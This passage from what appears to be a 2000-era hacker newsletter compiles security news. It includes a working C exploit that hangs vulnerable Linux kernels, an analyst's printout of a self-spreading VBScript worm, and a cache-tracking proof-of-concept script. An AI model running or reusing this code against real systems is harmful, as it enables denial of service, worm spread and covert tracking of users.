document entitled "g0at declares war on LoU" mocked the Legion of
the Underground's new attempt at becoming legit among a handful of
other aspects of their organization. Our original
url (goat.sphix.com) quickly grew in size and popularity, and our
channel became more populated. The hacks began soon after, some by
members and a lot by non-members. g0at's highpoint came soon after
the controversial yahoo hack. Our popularity skyrocketted and the
name g0at became known to all (unfortunatly we got all the l33t0s
in our channel and wouldn't go away). The fun and games continued
up until April, when all the 'incidents' began. Then May was the
last straw.
[Where do we go from here]
Most members will most likely go their own ways. Many still hang
in #feed-the-goatz (our new channel). No more text releases will
come from g0at, our webpage will remain down, our archive on
attrition.org will stay the same and nothing will be heard of us
as a group.
[Thanks and greets]
Thanks to all that supported our group and enjoyed the text we
wrote to amuse the unintelligent. Greets to all our 12 members,
HNN, attrition, net-security, HWA.hax0r.news. JP, for entertaining
us for hours with your hacker journalism. And thanks to all the
rest.
Finally.... it's been fun. It's been awesome being associated with g0at.
You can still reach us at g0at@attrition.org for further questions or
comments or whatever (I just want email)
g0at----------------------------------------------------------------------
[]=Debris=[]
debris@attrition.org
@HWA
161.0 b0f: exploit code to hang any linux machine by eth0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
b0f now has its own section on PSS, only a few files are currently hosted
but we expect the library will be updated in the future.
http://packetstorm.securify.com/advisories/b0f/
/* [http://b0f.morphed.net] - eth0 */
/* */
/* Vulnerable
Linux 2.2.12
Linux 2.2.13
Linux 2.2.14
Linux 2.3.99-pre2
The following exploit code will hang any Linux machine on various
Pentium
platforms.
Note that this does not require any special privileges, and any user
can
compile and run it, so watch out kiddies...
The send system call immediately puts the kernel in a loop spewing
kmalloc: Size
(131076) too large forever (or until you hit the reset button).
Apparently UNIX domain sockets are ignoring the
/proc/sys/net/core/wmem_max parameter,
despite the documentation to the contrary.
[code provided by eth0 from b0f security]
[information provided by Jay Fenlason]
[http://b0f.morphed.net]
[buffer0verfl0w security]
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data)
);
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr)
);
return 0;
}
@HWA
162.0 HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Brian
The National Infrastructure protection Center has identified a new
self replicating script (hmmm, they don't call it a virus?). The Alert
issued by NIPC says that the new script will erase hard drives and
dial 911 emergency systems. The script seems to only effect systems
running Windows that are setup with file and print sharing.
NIPC
ZD Net
Symantic
Network Associates
PC Help
http://www.nipc.gov/nipc/advis00-038.htm
http://www.zdnet.com/zdnn/stories/news/0,4586,2504397,00.html?chkpt
http://www.symantec.com/avcenter/venc/data/bat.chode.worm.html
http://vil.nai.com/vil/wm98557.asp
http://pc-help.org/news/scriptworm.htm
----------
NIPC (Gotta love their melodramatic all-caps eh? heh -Ed)
SUBJECT: NATIONAL INFRASTRUCTURE PROTECTION CENTER INFORMATION SYSTEM
ADVISORY (NIPC ADVISORY 00-038); SELF-PROPAGATING 911 SCRIPT
1. A RECENT AND BREAKING FBI CASE HAS REVEALED THE CREATION AND
DISSEMINATION OF A SELF-PROPAGATING SCRIPT THAT CAN ERASE HARD DRIVES AND
DIAL-UP 911 EMERGENCY SYSTEMS. WHILE INVESTIGATION AND TECHNICAL
ANALYSIS CONTINUE, THE SCRIPT APPEARS TO INCLUDE THE FOLLOWING
CHARACTERISTICS:
A. ACTIVELY SEARCH THE INTERNET FOR COMPUTER SYSTEMS SET UP FOR FILE AND
PRINT SHARING AND COPY ITSELF ON TO THESE SYSTEMS.
B. OVERWRITE VICTIM HARD DRIVES.
C. CAUSE VICTIM SYSTEMS TO DIAL 911 (POSSIBLY CAUSING EMERGENCY
AUTHORITIES TO CHECK OUT SUBSTANTIAL NUMBERS OF "FALSE POSITIVE" CALLS).
2. TO THIS POINT CASE INFORMATION AND KNOWN VICTIMS SUGGEST A RELATIVELY
LIMITED DISSEMINATION OF THIS SCRIPT IN THE HOUSTON, TEXAS AREA, THROUGH
SOURCE COMPUTERS THAT SCANNED SEVERAL THOUSAND COMPUTERS THROUGH
FOUR INTERNET SERVICE PROVIDERS (AMERICA ON-LINE, AT&T, MCI, AND NETZERO).
DISSEMINATED SCRIPT MAY BE PLACED IN HIDDEN DIRECTORIES NAMED CHODE,
FORESKIN OR DICKHAIR. FURTHER SCRIPT ANALYSIS BY THE FBI/NIPC CONTINUES.
3. FBI/NIPC REQUESTS RECIPIENTS IMMEDIATELY REPORT INFORMATION RELATING TO
USE OF THIS SCRIPT TO THE LOCAL FBI OR FBI/NIPC WATCH AT
202-323-3204/3205/3206. AS MORE TECHNICAL OR OPERATIONAL INFORMATION
ABOUT THIS SCRIPT DEVELOPS, NIPC WILL DISSEMINATE THIS INFORMATION THROUGH
THE CARNEGIE MELLON CERT, ANTIVIRUS VENDORS OR ITS OWN WEB SITE
(www.nipc.gov), AS APPROPRIATE.
-=-
pc-help;
VBScript Worm Infects Open Shares Thursday, 24 February 2000
While inspecting a client's misbehaving computer this evening, I found a
little surprise. His StartUp group contained a Visual Basic script which
on inspection proved to be a rather simple, self-replicating and
self-transmitting worm.
The client's system had a shared C: drive with no password, cause unknown.
The worm had either been placed on his system (no evidence so far of a
trojan but we've yet to do thorough scans) or it had arrived by reason if
its own action.
How It Works
The script resides in the StartUp group of the Start Menu and is therefore
run at each reboot. The filename is NETWORK.VBS.
The script creates a log file, C:\NETWORK.LOG, which it erases and
re-creates upon each new execution.
The script generates a random Class C subnet address and enters it in the
log. This address is the first three numbers of the usual four-part IP
address. It then steps thru all 255 addresses in that subnet. It blindly
attempts to map a shared C: drive at the remote address to local
drive letter J: at each address in turn. It checks each time to verify the
successful creation of a drive J: on its host.
If it has not connected, it repeats the process at the next address in
sequence. When it has stepped thru all 255 addresses of the current
subnet, it creates another random subnet address, enters it in
NETWORK.LOG, and continues attempting connections on the new subnet.
If it succeeds in mapping a remote drive, the script then attempts to copy
itself to a series of likely locations on that drive.
Its first act is to place a copy of itself in the root directory of drive
J:. If the file makes the journey, the script logs its success.
Then it copies itself to the following folders, most of them targeting the
StartUp group which will cause persistent execution of the script at every
reboot:
j:\windows\startm~1\programs\startup\ j:\windows\ j:\windows\start
menu\programs\startup\ j:\win95\start menu\programs\startup\
j:\win95\startm~1\programs\startup\ j:\wind95\
The script then disconnects, effectively removing drive J:.
It then goes back to work "scanning" addresses without cease.
Incidentally, if the host system has a drive using the letter J: the
script will fail to propagate.
Here are the contents of NETWORK.LOG as found on my client's system:
Log file Open Subnet : 211.203.133.0 Subnet : 203.251.228.0 Subnet :
201.244.147.0 Subnet : 204.97.180.0
This particular log reflects the fact that the worm had no success
transferring itself during its last session. The system had been rebooted
about two hours or so before, and had been offline most of that time. The
script had tried only about 1000 addresses in that period. This
small number was presumably because of the delay, usually about 10
seconds, resulting from a connection attempt to a nonexistent host.
The Script
My analysis is in blue text.
Note: A single small alteration of this code renders it impotent. The
remainder has been left intact for the benefit of well-intentioned
readers.
dim octa dim octb dim octc dim octd dim rand dim dot dim
driveconnected dim sharename dim count dim myfile // Creates a
bunch of variables. count = "0" dot = "." driveconnected="0" set
wshnetwork = wscript.createobject("wscript.network") Set fso1 =
createobject("scripting.filesystemobject") set fso2 =
createobject("scripting.filesystemobject") // Sets a bunch of variables.
on error resume next randomize checkfile() // Erases and then
re-creates its log file, c:\network.log. randaddress() // Generates a
random Class C subnet address (that's a block of 255 addresses).
checkaddress() // Increments the IP address by one; and creates a new
random subnet if this one's been covered. shareformat() // Creates a
textstring, using the current IP address, which will be used to map a
shared drive. wshnetwork.mapnetworkdrive "j:", sharename // Maps the
shared drive to J:, blindly assuming there's one at the address.
enumdrives() // Checks to see if it's successfully mapped the drive.
copyfiles() // Places a copy of itself in several places on the
drive (someone else's machine someplace). disconnectdrive() // Drops the
connection. msgbox "Done"
function disconnectdrive() wshnetwork.removenetworkdrive "j:"
driveconnected = "0" end function
function createlogfile() Set myfile =
fso1.createtextfile("c:\network.log", True) end function
function checkfile() If (fso1.fileexists("c:\network.log")) then
fso1.deletefile("c:\network.log") createlogfile() else createlogfile() end
If myfile.writeLine("Log file Open") end function
function copyfiles() myfile.writeline("Copying files to : " &
sharename) Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile "c:\network.vbs", "j:\"
If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to : " & sharename) End If
fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\wind95\"
end function
function checkaddress() octd = octd + 1 if octd = "255" then
randaddress() end function
function shareformat() sharename = "\\" & octa & dot & octb & dot &
octc & dot & octd & "\C" end function
function enumdrives() Set odrives = wshnetwork.enumnetworkdrives For
i = 0 to odrives.Count -1 if sharename = odrives.item(i) then
driveconnected = 1 else ' driveconnected = 0 end if Next end function
function randum() rand = int((254 * rnd) + 1) end function
function randaddress() if count > 50 then octa=Int((16) * Rnd + 199)
count=count + 1 else octa="255" end if randum() octb=rand randum()
octc=rand octd="1" myfile.writeLine("Subnet : " & octa & dot & octb & dot
& octc & dot & "0") end function
Why did I publish this code?
Comments
This is the first worm I've seen that was targeted to take advantage of
open (sans password) shares. I have no idea whether similar exploits exist
nor whether anyone else has spotted this particular creature. (25 Feb: I
now know that this worm has been known to AV vendors for several
days. Most of them have issued patches for its detection.)
In my opinion, any working copy of this worm is almost certain to
replicate itself on several other machines before it's detected by the
user, so it is probably spreading at a steady -- perhaps even exponential
-- rate.
It's impossible to estimate the incidence of open shares with certainty;
but I've poked around looking for them a time or two in an effort to
estimate them; so I think I can hazard an educated guess. I'd say one or
two addresses in a thousand harbor a system with open shares, and a
significant percentage of those will permit access to the entire C: drive.
While online this worm might easily scan several thousand potential
victims in the course of a few hours, which means that an undetected worm
residing on a system that's online several hours a day has a high
probability of replicating itself something like once every day or two.
The capability to run these scripts is installed with Internet Explorer 5.
I'm not sure about IE4. I believe this means that Win98 systems are much
more likely than Win95 machines to have the Windows Script Host installed.
So the script won't run on a significant proportion of the "legacy"
systems which were more easily misconfigured for open shares. This could
reduce its rate of propagation.
25 Feb: UseNet reports indicate that this worm can cause slowdowns on a
LAN. It stands to reason! As reported by NAI at
http://vil.nai.com/vil/vbs98477.asp, the effect of the worm's simultaneous
action on numerous systems on a network may overload or crash
servers which receive a flood of DNS requests resulting from the script's
activity.
Note that in systems with Windows Script Host installed, there will be a
file named NETWORK.VBS in the Windows directory. Don't be alarmed. This is
a harmless sample script. If you're infected, the bad guy will be in the
StartUp folder and in the root directory.
Removal
To kill the script, move it out of the StartUp folder and reboot. If
Windows won't allow this, reboot to MS-DOS (don't just open a DOS window)
and type this command:
ren \windows\startm~1\programs\startup\network.vbs network.txt
Hit Enter. If no error message displays, it worked. Now when you restart
Windows, the script will not run, instead it will open up for examination
in Notepad. If it's not identical to the one I've quoted above, I'd
appreciate it if you'd send me a copy.
In Sum
The worm script does nothing nefarious aside from taking up bandwidth on
the Net link and consuming some processing power on the host system. But
it may have been responsible for some annoying lockups that were observed
on my client's system.
Fortunately it doesn't phone home, nor otherwise serve to advertise the
victim's open shares. But it could easily do so with simple additions. So
it illustrates a rather serious potential for exploit. In fact, given
history, I consider it a positive certainty that more hostile
versions of this thing will appear.
A worm like this with phone-home or broadcast features might spread far
and wide, and report on open shares on a huge scale. It would probably lay
a lot of people open to near-certain intrusion. It should stand as a grim
reminder of the potential seriousness of open shares.
Anyone who simply ensures they're not sharing their entire C: drive with
write permission on the Internet link has nothing to fear from this worm.
If it writes to a shared subdirectory or to another drive, it won't run.
For more on open shares and their solutions, see my page titled File And
Printer Sharing And The Internet.
I am suddenly very interested in this sort of scripting. If you too would
like to investigate it in greater detail, here are some useful links:
@HWA
163.0 HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by g.machine()
The district court of Hannover Germany has sentenced the creator of
Tribe Flood Network, the tool allegedly used in the recent massive
DDoS attacks, to 6 six months youth punishment on probation. Mixter
was accused of "computer sabotage" and "spying on data". However, the
trial had nothing to do with the recent attacks on major internet
sites, such as CNN or eBay, Mixter was sentenced due to a felony that
happened two years ago. In 1998 he repeatedly broke into several
company systems and spied on their data.
Heise - German Yahoo News - German
http://www.heise.de/newsticker/data/pab-31.03.00-000/
http://de.news.yahoo.com/000331/33/o0fp.html
----------
Freitag M�rz 31, 2:53 PM
Jugendstrafe f�r bekannten Computer-Hacker �Mixter�
Hannover (dpa) - Der bekannte Hacker �Mixter� ist in Hannover zu einer
Jugendstrafe von sechs Monaten auf Bew�hrung verurteilt worden. Der
21-J�hrige habe mit Computersabotage �betr�chtlichen Schaden� angerichtet,
hei�t es im Urteil. Bekannt wurde �Mixter� nach den j�ngsten
Hacker-Angriffen auf amerikanische Internet-Firmen. Er hatte das daf�r
benutzte Programm TFN erstellt. Damit wurden das Internet- Portal Yahoo,
der Online-Aktienh�ndler E*Trade, der Buchh�ndler Amazon.com und der
Nachrichtendienst CNN.com stundenlang lahm gelegt.
-=-
Babelfishes almost English version:
In English: (Well sorta) heh
Friday March 31, 2:53 PM
Youth punishment for well-known computer hacker " Mixter " Hanover (dpa) -
the well-known hacker " Mixter " was condemned in Hanover to a youth
punishment by six months on probation. The 21-Jaehrige caused, is called
considerable damage " with computer sabotage " it in the judgement. Admits
became " Mixter " after the recent hacker attacks on American Internet
companies. It had prepared the program TFN used for it. Thus the Internet
portal Yahoo, the on-line stock broker E*Trade, the bookseller Amazon.com
and the intelligence service NCN.com were for hours lamely put.
@HWA
164.0 HNN:Apr 3rd:Forget Cookies, Worry About Cache
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evenprime
Those of us who place a high value on our privacy usually have cookies
turned off within our browsers. However web sites can still track you
visits by looking at your cache. Web sites are able to check HTTP
cache-control headers such as If-Modified-Since to track individual
users.
Linux Care
http://www.linuxcare.com.au/mbp/meantime/
----------
meantime: non-consensual http user tracking using caches
From WordNet (r) 1.6 [wn]:
mean
2: characterized by malice; "a hateful thing to do"; "in a mean
mood"; "told spiteful stories about the fat lady" [syn: {hateful},
{spiteful}]
3: having or showing a meanspirited lack of honor or morality;
4: (slang) excellent; "famous for a mean backhand"
time
5: the continuum of experience in which events pass from the
future through the present to the past
executive summary
HTTP cache-control headers such as If-Modified-Since allow servers to
track individual users in a manner similar to cookies, but with less
constraints. This is a problem for user privacy against which
browsers currently provide little protection.
introduction
Some people would like to be anonymous as they use the web, and other
people would like to prevent anonymous access for various reasons.
Consider, for example, an internet marketing company that wants to chain
together visits to various web sites by a user so as to build a
fuller profile of their interests and usage patterns. Conversely, a web
user might not wish to leak such information to a site because they are
looking at controversial information, desire a good negotiating position,
or see privacy as a moral right.
An arms race in techniques for providing and stripping away anonymity has
developed over the years. This black paper discusses what is believed to
be a new technique for tracking clients and possible responses.
problem statement
Alice is browsing the web; Bob runs a number of otherwise-unrelated
web servers. Alice makes several requests to Bob's servers over time.
Bob would like to tie together as many as possible of the requests
made by Alice to learn more about Alice's usage patterns
and identity: we call this identifying the request chain. Alice would
like to access Bob's servers but not give away this information.
There are many perfectly good reasons why in a particular situation B
might want to know A's identity, or at least a unique pseudonym. If B
explains the reasons why tracking is required, then A can consent to and
allow tracking in various ways. There are several less savory
possibilities when A does not consent to the tracking or does not realize
that a single chain can be found across apparently unrelated servers
controlled by B.
The scenario poses an interesting information-theory and game-theory
challenge in anonymity. It is also immediately practical: there is a good
deal of development being done in aid of both Alice and Bob.
existing approaches
cookies
The standard approach for associating user requests across several
responses is the HTTP `Cookie' state-management extension. The Cookie
response header allows a server to ask the client to store arbitrary short
opaque data, which should be returned for future requests of that
server matching particular criteria. Cookies are commonly used to store
per-user form defaults, to manage web application sessions, and to
associate requests between executions of the user agent.
The user agent always has the option to just ignore the Set-Cookie
response header, but most implementations default to obeying it to
preserve functionality. Cookies can optionally specify an expiry time
after which they should no longer be used, that they should persist
on disk between client session, or that they should only be passed over
transmission-level-secure connections.
The privacy implications of cookies have been extensively discussed, and
several problems have been found and recitified in the past. One example
of privacy compromise through cookies is the use of cookies attached to
banner images downloaded from a central banner server: the same
cookie is used within images linked from several servers, and so the user
can be tracked as they move around.
other approaches
An obvious means to associate requests is by source IP address. Over the
short term this will generally work quite well, as a client is likely to
use a single IP address during a browsing session. Even then it is
complicated by proxies acting for multiple clients, network address
translation, or multiuser machines. Over a longer term, the information is
convolved by dynamically-assigned IPs, mobile computers moving between
networks, dialup pools and the like. Indeed, cookies were proposed in
large part to allow legitimate stateful applications to cope with the
impossibility of uniquely identifying users by IP address.
Within a single site, state may be maintained by generating dynamic URLs
that include session identification either within the hostname
(http://d9128309812.crackmonkey.org/) or path
(http://crackmonkey.org/d213213213/faq.html). However, this does not
allow tracking between sites and causes a significant loss of
functionality because URLs cannot be shared between users or bookmarked.
Single links can be identified by the HTTP Referer header. There are some
limitations here, however: this only identifies the immediately preceding
resource, and the link is lost if the user re-enters a URL by hand or
retrieves it from a bookmarks file.
countermeasures
Users caring to preserve their privacy have taken various countermeasures
against these techniques.
To reassure end-users about cookie privacy issues, user agents such as
Netscape Navigator, Microsoft Internet Explorer and Lynx allow the user
some control. The most basic control is to enable or disable cookies
altogether; some user agents allow this to be specified for
particular domains. There may be more fine-grained controls, such as only
accepting cookies from the same server as the top-level page currently
viewed and not from servers for subsidiary requests such as images or
frames.
The broadest protection is afforded by the use of a proxy local to the
browsers machine, such as Internet Junkbuster. This software rewrites the
request to strip out identifying browser and cookie information, in
addition to attempting to remove advertising banners.
Various proxying solutions are available to prevent identification by IP
address, such as anonymizer.com and CROWDS.
A similar but more powerful attack is possible through the
cache-management headers proposed in draft-mogul-http-delta-02.
caching in http
To make access faster and reduce network usage, browsers generally keep a
copy of resources such as pages and images that they download. When a
client has a cached copy of a page, it can decide either to use the cached
copy as is, or to send a request to the server to check that it is
up-to-date.
When the client sends a request for the copy it has in cache, it sends a
conditional request describing the cached copy and asking the server to
only transfer the body of the resource if it is newer than the cached
copy.
The most common means of checking this currently in use is the
Last-Modified date header. The server supplies a date in the metadata of
the response, and the client returns the same date when sending a
conditional request.
Other techniques, such as checking the length of the resource body, its
MD5 hash, and a unique ETag cookie have also been used.
the meantime exploit
The fundament of the meantime exploit is that the server wishes to `tag'
the client with some information that will later be reported back,
allowing the server to identify a chain. Cookies are a good approach to
this, but their privacy implications are well known and so Bob
requires a more surreptitious approach.
The HTTP cache-control headers are perfect for this: the data is provided
by the server, stored but not verified by the client, and then provided
verbatim back to the server on the next matching request.
Two headers in particular are useful: Last-Modified and ETag. Both are
designed to help the client and server negotiate whether to use a cached
copy or fetch the resource again.
The general approach of meantime is that rather than using the headers for
their intended purpose, Bob's servers will instead send down a unique tag
for the client.
Last-Modified is constrained to be a date, and therefore is somewhat
inflexible. Nevertheless, the server can reasonably choose any second
since the Unix epoch, which allows it to tag on the order of one billion
distinct clients.
ETag allows an arbitrary short string to be stored and passed. It is not
so commonly implemented in user agents at the moment, and so not such a
good choice.
In both cases the tag will be lost if the client discards the resource
from its cache, or if it does not request the exact same resource in the
future, or if the request is unconditional. (For example, Netscape sends
an unconditional response when the user presses Shift+Reload.) Bob
has less control over this than he has with cookies, which can be
instructed to persist for an arbitrarily long period.
The date is only sent back for the exact same URL, including any query
parameters. By contrast, cookies can be returned for all resources in a
site or section of a site. This makes Bob's job a little harder.
Bob therefore should make sure that all pages link to a small common
resource: perhaps a one-pixel image. This image is generated by a script
that supplies and records a unique timestamp to each client, and records
whatever is already present.
intermediate proxies.
The presence of proxy caches between the client and the server will
complicate the situation for Bob, because if the proxy holds a copy of the
resource it might satisfy the request locally or change the cache control
criteria. In the extreme case, if the proxy does all the caching and
the client none, then Bob will identify all requests through that proxy as
a single chain.
Bob need not despair. Proxy usage is still quite low, and there are some
indications that people concerned about anonymity will not route their
requests through a proxy that might log them.
In fact, a meantime exploit is entirely possible if Bob controls an
intermediate proxy. This seems not to be so much of a threat in practice,
however, because proxies are most commonly controlled by the
administrators of a local network who already have considerable
power to trace users.
If intermediate proxies or clients implement expiry heuristics then this
can interfere with tracking, but not irredeemably so.
demonstration
This very simple demonstration places a tag in your browser's cache, and
allows you to associate a short string with it on on our server. It should
persist as long as the record remains in your browser's cache.
If there are several caches on your system, perhaps for different use
profiles, or for different user agents, then each will get one tag. It
will not be confused by other people accessing the system from the same
machine, by use of different IP addresses, or by cookies being
disabled.
The demonstration will be easier to understand if your browser is set to
`Cache is compared to network on every request'. If that setting is not
checked, your access will still be tracked but the fields of the page may
not seem to update.
This will not work in Lynx.
track me
source code
results
This code is a demonstration of the principle, rather than a full
implementation of tracking. Nevertheless:
It works quite reliably against Netscape. Lynx apparently
never sends conditional requests, and so is safe. Junkbuster does not
prevent tracking. anonymizer.com seems to keep a cache on their
servers and rewrites the page as it passes through, so it seems to be
safe: all anonymizer.com users appear as one.
implications
Anonymizing software should probably strip out all cache headers.
Unfortunately this will slow down access and waste network bandwidth, but
it seems necessary that the client should not return any information to
the server if it is to preserve anonymity.
Possibly Alice should ask her client to never refresh cached requests
unless explicitly requested: this will maintain performance for the common
case of unchanged pages. When the page must be refreshed, she should be
careful that no information about the previously cached copy is
emitted.
If all of Alice's requests were directed through an anonymizing proxy
crowd it would be harder to associate the tagged requests with her other
activities, but not infeasible.
Clients could try to manipulate the modification times to give Bob less
room to move: for example, they could round off the time to the lowest
minute, and could clip times to be no more than a year from the current
date. But this still leaves several bits of the value under Bob's
control: even separating users into equivalence classes based on where
they first accessed this site might be interesting, for example.
Designers of future protocols should consider similar tagging security
issues. For example, although ETags allow better cache consistency
problems than Last-Modified headers, they make tracking even easier by
allowing the server to store arbitrary data on the client.
references
There was some discussion of problems with Last-Modified on the HTTP
Working Group mailing list, but it seems they didn't identify the
privacy problems.
revision history
2000-03-28 Cleared up the explanation. 2000-03-29 Further
revise the text after feedback from OzLabs hackers.
Add Cache-Control headers to the demo to try to be more in the style
of HTTP/1.1. Add a form through which users can record a string
associated with their cache. Also keep track of how many times they
have visited the page.
Test against anonymizer.com and junkbuster.
The code:
#! /usr/bin/python
# $Id: meantime.py,v 1.3 2000/03/29 05:47:03 mbp Exp $
# Copyright (C) 2000 by Martin Pool.
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
import cgi
from os import environ
import gdbm
from sys import stdout, stderr
from time import gmtime, asctime, ctime, time
from string import find
def nice_get(dict, key):
if dict.has_key(key):
return dict[key]
else:
return None
def log(str):
stderr.write(str + '\n')
form = cgi.FieldStorage()
datafile = gdbm.open('mtdata', 'c')
method = nice_get(environ, 'REQUEST_METHOD')
if method == 'POST':
ims = form['tag'].value
newvalue = form['newvalue'].value
datafile[ims] = newvalue
value = newvalue
log('updated key %s to %s' % (ims, value))
else: # method == 'GET' i hope
ims = nice_get(environ, 'HTTP_IF_MODIFIED_SINCE')
if ims:
log('got ims "%s"' % ims)
# there might be extra parameters after the date such as the
# length, but we ignore them
pos = find(ims, ';')
if pos > 0:
ims = ims[:pos]
value = nice_get(datafile, ims)
log('retrieved value %s for key %s' % (`value`, `ims`))
else:
next = int(nice_get(datafile, 'Next') or 0)
next = next + 1
datafile['Next'] = str(next)
ims = asctime(gmtime(next))
log('Generated new fake time %s' % ims)
value = None
if value is None:
value = '%s:%s %s' % \
(nice_get(environ, 'REMOTE_ADDR') or 'Unknown',
nice_get(environ, 'REMOTE_PORT') or 'Unknown',
asctime(gmtime(time())))
datafile[ims] = value
log('remembering value "%s" for key "%s"' % (value, ims))
count_key = ims + ';count'
count = nice_get(datafile, count_key)
if count is None:
count = 1
else:
count = int(count) + 1
datafile[count_key] = `count`
datafile.close()
stdout.write("HTTP/1.1 200 OK\r\n");
stdout.write("Content-Type: text/html\r\n");
stdout.write("Last-Modified: " + ims + "\r\n");
stdout.write("Cache-Control: private\r\n");
stdout.write("Cache-Control: must-revalidate\r\n");
stdout.write("\r\n");
stdout.write("""<p>Your browser's cache has just been tagged and tracked
by <a href="http://www.linuxcare.com.au/mbp/meantime/">meantime</a>. You
have visited this resource <b>%d</b> times using this tag.
<form action="nph-meantime.cgi" method="POST">
<input type="hidden" name="tag" value="%s">
<input type="text" name="newvalue" size="80" value="%s">
<input type="submit" value="Remember me!">
</form>
""" % (count, ims, value))
cgi.print_environ()
@HWA
165.0 HNN:Apr 3rd:Identity Theft On the Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by royb
Identity theft is on the rise, while not a new crime law enforcement
officials credit the Internet with its rising popularity. (Glad to see
the NY Times using words other than hacker to equate criminal.)
NY Times
http://www.nytimes.com/library/tech/00/04/biztech/articles/03theft.html
(no article - pay site leeches - Ed)
----------
@HWA
166.0 HNN:Apr 3rd:Computer Crime Laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
An interesting site that lists the computer crime statutes for most of
the 50 states and several countries.
Lady Sharrow
http://www.ladysharrow.com/Library/LAWS/
----------
@HWA
167.0 HNN:Apr 4th:Computers Turned Into Bombs Via The Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Sean
Arnold Yabenson, president of the Washington-based consumer group
National CyberCrime Prevention Foundation (NCPF) claims that a
purposely written email attachment can have the potential to change
the electrical current and molecular structure of the central
processing unit causing a violent explosion. (There is no date on this
but this has to be an old April Fools joke.)
Weekly World News
http://www.weeklyworldnews.com/stories/1450.html
----------
(yeah you guessed it its a 404, probably not missing much either heh
- Ed)
@HWA
168.0 HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Glassbook, publisher of Stephen King's 66-page novella that was
released for sale on-line, announced prior knowledge of security
vulnerabilities in the applications used to read the book. Use of
these insecure applications enabled piracy of the book.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,16009,00.html
----------
Hacking the Bullet
The rush to release Stephen King's e-book
compromised piracy safeguards.
by Christine McGeever, Computerworld
April 3, 2000, 9:09 a.m. PT
Now that pirated versions of the popular 66-page
electronic novella by Stephen King, "Riding the Bullet,"
have surfaced, the electronic book's distributor,
Glassbook, will release a more secure version of its
e-book reader.
Glassbook President Len Kawall says that the updated
version will be available next week, equipped with
security features that should have been present for the
King book release. But in the hurry to get the book out
to market, a less robust reader was used.
As a result, Kawall says, someone "chiseled in" to the
content of the book after downloading and opening it in
the reader. He adds that encryption technology used to
transmit the book securely on the Internet was not
compromised.
However, the version of the book reader used with
King's novella was vulnerable from the start, and both
Glassbook and "Riding the Bullet" publisher Simon &
Schuster knew it. Kawall says that Glassbook wanted
to distribute the book with a reader that had 64-bit
encryption, but couldn't make the publisher's deadline
with the updated reader.
In addition, the specification used to secure the book in
transmission hasn't yet been formalized by the
standards group behind it, the Book Industry Study
Group. The Electronic Book Exchange specification
hasn't been presented in a finished draft, nor has it
been presented in any manner for industry review,
according BISG spokesperson Sandra Paul.
The BISG was formally announced on March 28, two
weeks after the King book was released.
Kawall adds that "Simon & Schuster absolutely
understands" how a security breach could occur and
that the industry "has learned to live with piracy." He
cites the 400,000 to 500,000 legitimate copies of the
book in distribution compared to what he estimates to
be "a few" pirated copies.
Adds Kawall, "It is not the end of e-books. Our job is to
make it more pleasurable to purchase the product from
a legitimate source."
Meantime, Glassbook has announced the new reader
and posted on its Web site "aggressive steps" it plans
to take "to stem e-book privacy." The steps outlined
include forming a full-time antipiracy support team that
will search the Internet for pirated material, work with
the publisher to remove illegally published material, and
cooperate with the FBI and international authorities to
monitor, track, and report suspected digital piracy and
copyright infringement.
@HWA
169.0 HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Eric
Brian Michael Jacobs, 23, of Mobile, Alabama was arraigned by U.S.
Magistrate Bert W. Milling Jr. last Wednesday. He has been charged
with knowingly transmitting "code and commands to the computer of an
Internet Service Provider (ISP)" which resulted in more than $5,000 in
damage. He faces a potential sentence of up to five years in federal
prison and $250,000 in fines.
Alabama Live
